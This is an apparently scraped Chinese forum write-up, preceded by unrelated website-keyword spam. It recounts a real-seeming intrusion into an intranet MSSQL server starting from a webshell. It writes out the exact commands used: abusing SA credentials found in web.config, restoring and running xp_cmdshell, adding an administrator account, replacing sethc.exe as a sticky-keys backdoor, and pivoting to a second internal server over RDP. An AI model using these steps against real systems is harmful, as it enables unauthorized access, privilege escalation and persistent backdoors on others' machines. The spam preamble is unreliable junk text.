两学一做网站进不去,织梦物流公司网站模板简洁大气,oa电子办公系统,做网站好用的cms图文#xff1a;udb311主题#xff1a;MSSQL内网渗透案例分析发表#xff1a;黑白前线描述#xff1a;对于内网渗透技术一直感觉很神秘#xff0c;手中正巧有一个webshell是内网服务器。借此机会练习下内网入侵渗透技术#xff01;本文敏感信息以屏蔽#xff01;密码都以…图文udb311主题MSSQL内网渗透案例分析发表黑白前线描述对于内网渗透技术一直感觉很神秘手中正巧有一个webshell是内网服务器。借此机会练习下内网入侵渗透技术本文敏感信息以屏蔽密码都以*号代替。此次过程主要运用到xp_cmdshell恢复与执行再通过自己的灵活思维运用。环境2003 SERVERIIS 6.0 支持php数据库MSSQL和MYSQL网站类型ASPX本文重点讲述内网渗透提权部分对于WEBSHELL不在描述。对于了解入侵渗透的朋友都知道拿到webshell后服务器能否提权就要先找提权 的漏洞所在。从本站的角度来看存在MSSQL、MYSQL支持ASPX和PHP可以说权限够大的了。先来看看目录能穷举出来哪些东西。先看程序目录很 平常么。没现有SU和MYSQL之类的信息。E盘可以浏览F盘可以浏览本站ASPX 类型网站使用的是MSSQL数据库。显示密码不是最高权限的用户就是是个DB用户提权也不能马上到手。再翻翻别的站点目录可以浏览一个个找吧。发现一个目录web.config有SA用户连接数据库信息Sourcegzzx;Initial CatalogSMSCenter;Persist Security InfoTrue;User IDsa;Password**** 打开aspxspy使用database连接功能。登录成功显示SA看来应该没有降权。连接状态是MSSQL 2005要先启xp_cmdshell.接着执行下命令whoami.html target_blankwhoamigoodsystem 权限下面就是添加一个账号了。。Exec master.dbo.xp_cmdshell net user admin **** /addExec master.dbo.xp_cmdshell net localgroup administrators admin /add再看下3389端口是否开启Exec master.dbo.xp_cmdshell stat.html target_blanknetstat -anoOK,状态正常。Exec master.dbo.xp_cmdshell ipconfig /all显示配置是内网IP通过域名解析到的IP连接3389可以连接。说明管理做了端口映射这就不要转发端口了。省了很多功夫这才拿到了一台服务器的权限从网站的SQL连接上不难发现内网还有SQL服务器。渗透继续……内网IP为200同样是MSSQL SA权限。再利用aspxspy 数据库连接郁闷的事情发生了不能连接。[DBNETLIB][ConnectionOpen (Connect()).]SQL Server 不存在或拒绝访问。按道理讲数据库能使用的情况下应该可以成功连接上的难道没有配置TCP/IP访问数据库疑问产生了无耐之下通过3389上到服务器上来试试。服务器安装了MSSQL有查询分析器和企业管理器。这又成了我们的工具。呵呵SQL分析器连接之仍然无法连接。先测试下所在的MSSQL服务器机器的存在性。成功响应说明服务器存在。运行mstsc试着3389连接下显示了一个xp的界面。比较郁闷耶。试下名称解析服务。。。点击浏览一看这么多MSSQL服务器名还真不知道哪台是的。观察下发现200和IP200的机器有些相近。输入SA及密码。成功返回查询窗口。试下xp_cmdshell发现不存在恢复之Use master dbcc addextendedproc(xp_cmdshell,xplog70.dll)OK执行命令whoami,虽然XP不支持whoami命令。exec xp_cmdshell net user 123 123 /add提示系统错误。不是没权限添加。。。。不明真像了。。。思路开了3389可以用sethc.exe 替换来。。。exec xp_cmdshell copy c:windwosexplorer.exe c:windowssystem32sethc.exe替换之问题又来了提示磁盘文件不足。利用xp_dirtree查看下C盘EXEC MASTER..XP_dirtree c:,1,1列出文件目录删除一个数据库的备份再执行exec xp_cmdshell copy c:windwosexplorer.exe c:windowssystem32sethc.exe提示一个文件被复制说明成功。3389 5次shift未弹出。再试下exec xp_cmdshell net user 123 123 /add 提示成功。原来开始是空间不足导致的系统错误啊。真像揭开exec xp_cmdshell net localgroup administrator 123 /add3389登录之。。exec xp_cmdshell net user 123 /del删除用户内网还存在很多机器此次渗透就此结束。。。总结内网从端口转发到外部连接再从3389登录内部3389 跟跳板技术差不多。